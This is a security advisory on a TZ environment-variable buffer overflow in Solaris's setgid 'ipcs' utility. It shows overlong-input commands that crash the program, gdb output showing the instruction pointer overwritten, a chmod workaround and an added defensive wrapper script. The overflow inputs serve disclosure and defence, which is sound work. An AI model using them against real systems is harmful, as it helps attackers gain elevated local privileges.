COMMAND

    ipcs

SYSTEMS AFFECTED

    Solaris 7 x86 (Other Solaris versions are most likely affected also)

PROBLEM

    Marc Maiffret found the following. He has discovered a buffer
    overflow in the /usr/bin/i86/ipcs utility provided with Solaris
    7. The problem exists in the parsing of the TZ (TIMEZONE)
    environment variable. By exploiting this vulnerability an
    attacker can achieve local sys group privileges. IPCS is used
    for gathering information on active inter-process communication
    facilities. Exploitation of this vulnerability would be very
    difficult, but not impossible.

        bash-2.03$ TZ=`perl -e 'print "A"x1035'`
        bash-2.03$ /usr/bin/i86/ipcs
        IPC status from as of Wed Apr 11 17:18:59 [buffer] 2001
        Message Queue facility inactive.
        T ID KEY MODE OWNER GROUP
        Shared Memory:
        m 0 0x500004d3 --rw-r--r-- root root
        Semaphore facility inactive.
        Segmentation Fault (core dumped)

    Note: [buffer] stands for the TZ value echoed back by ipcs, a string of about 1036 characters (here all A's).

        bash-2.03$ su root
        Password:
        # gdb /usr/bin/i86/ipcs core
        GNU gdb 5.0
        Copyright 2000 Free Software Foundation, Inc.
        GDB is free software, covered by the GNU General Public License, and you are
        <snip>
        #0 0x41414141 in ?? ()
        (gdb) info reg eip
        eip 0x41414141 0x41414141
        (gdb)

    Solaris 7 on 64-bit SPARC crashes as well, but the buffer needs to be
    filled with more than 1200 bytes. The segfault occurs on an ldsb
    instruction, so it is not known whether this bug is exploitable there.

    Solaris 8 seems to have a larger buffer (guessed at about 2k), yet it
    still overflows:

        Solaris 8, 64bit:
        [root@ias1 /root]# uname -a
        SunOS ias1 5.8 Generic_108528-06 sun4u sparc SUNW,UltraAX-i2
        [root@ias1 /root]# isainfo -b
        64
        [root@ias1 /root]# export TZ=`/usr/bin/perl -e 'print "A"x2107'`
        [root@ias1 /root]# ipcs
        Segmentation Fault (core dumped)

        Solaris 8, 32bit:
        [root@nite /root]# uname -a
        SunOS nite 5.8 Generic_108528-06 sun4u sparc SUNW,Ultra-5_10
        [root@nite /root]# isainfo -b
        32
        [root@nite /root]# export TZ=`/usr/bin/perl -e 'print "A"x2107'`
        [root@nite /root]# ipcs
        Segmentation Fault

        Solaris 7, 64bit:
        [root@dwhs /root]# uname -a
        SunOS dwhs 5.7 Generic_106541-15 sun4u sparc SUNW,Ultra-Enterprise
        [root@dwhs /root]# isainfo -b
        64
        [root@dwhs /root]# export TZ=`/usr/local/bin/perl -e 'print "A"x2107'`
        [root@dwhs /root]# ipcs
        Segmentation Fault

SOLUTION

    Sun Microsystems has been  contacted.  They are  currently working
    on patches  for this  and other  related vulnerabilities  eEye has
    discovered.

    Workaround:

        chmod -s /usr/bin/i86/ipcs

    This will remove the setgid bit from /usr/bin/i86/ipcs,  therefore
    if someone does exploit this vulnerability, they won't gain higher
    privileges.

    Nowadays people are using wrappers to prevent this kind of exploit,
    since they can't afford to wait for Sun's patches.
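    As an added example, not code from the advisory, eEye or Sun, the
    POSIX shell script below shows what the wrapper approach mentioned
    above and the chmod -s workaround amount to in practice. It assumes
    the original setgid binary has been moved to the hypothetical path in
    REAL_IPCS and that the script is installed in its place; MAX_TZ_LEN is
    an arbitrary conservative cap chosen well below the sizes reported in
    the advisory. The wrapper drops an oversized or oddly formed TZ from
    the environment before handing off to the real program, and
    setgid_is_cleared lets an audit script confirm the workaround has been
    applied.

```sh
#!/bin/sh
# Added example, not part of the advisory or of Sun's code: a defensive
# wrapper for ipcs plus a check for the "chmod -s" workaround.
# Assumptions: the setgid binary has been renamed to $REAL_IPCS and this
# script is installed at the original path; MAX_TZ_LEN is an arbitrary cap.

REAL_IPCS="${REAL_IPCS:-/usr/bin/i86/ipcs.real}"   # assumed location of the renamed binary
MAX_TZ_LEN="${MAX_TZ_LEN:-128}"                     # far below the ~1035 bytes reported for Solaris 7 x86

# tz_is_sane VALUE
# Returns 0 when VALUE is no longer than MAX_TZ_LEN and contains only the
# characters an unquoted POSIX TZ string uses (letters, digits, + - , / : . _).
# The angle-bracket quoted form (e.g. <+03>-3) is deliberately rejected to
# keep the filter conservative; control bytes and shell metacharacters fail too.
tz_is_sane() {
    value=$1
    [ "${#value}" -le "$MAX_TZ_LEN" ] || return 1
    case $value in
        *[!A-Za-z0-9+,/:._-]*) return 1 ;;
    esac
    return 0
}

# setgid_is_cleared PATH
# Returns 0 when PATH does not carry the setgid bit, i.e. the advisory's
# "chmod -s" workaround has been applied (or the bit was never set).
setgid_is_cleared() {
    [ ! -g "$1" ]
}

# run_wrapped ARGS...
# Removes a suspicious TZ from the environment, then replaces this process
# with the real ipcs so legitimate callers see unchanged behaviour.
run_wrapped() {
    if [ -n "${TZ+set}" ] && ! tz_is_sane "$TZ"; then
        echo "ipcs wrapper: ignoring TZ (${#TZ} bytes or unexpected characters)" >&2
        unset TZ
    fi
    exec "$REAL_IPCS" "$@"
}

# Hand off only when the renamed binary is actually installed; otherwise the
# script does nothing, which keeps it safe to source from an audit script.
if [ -x "$REAL_IPCS" ]; then
    run_wrapped "$@"
fi
```

    To use the audit helper on its own, source the script and call
    `setgid_is_cleared /usr/bin/i86/ipcs`; a non-zero return means the
    binary still runs with sys group privileges. Note that the wrapper
    only filters TZ, so it does not protect against the other related
    issues the advisory says Sun is still patching.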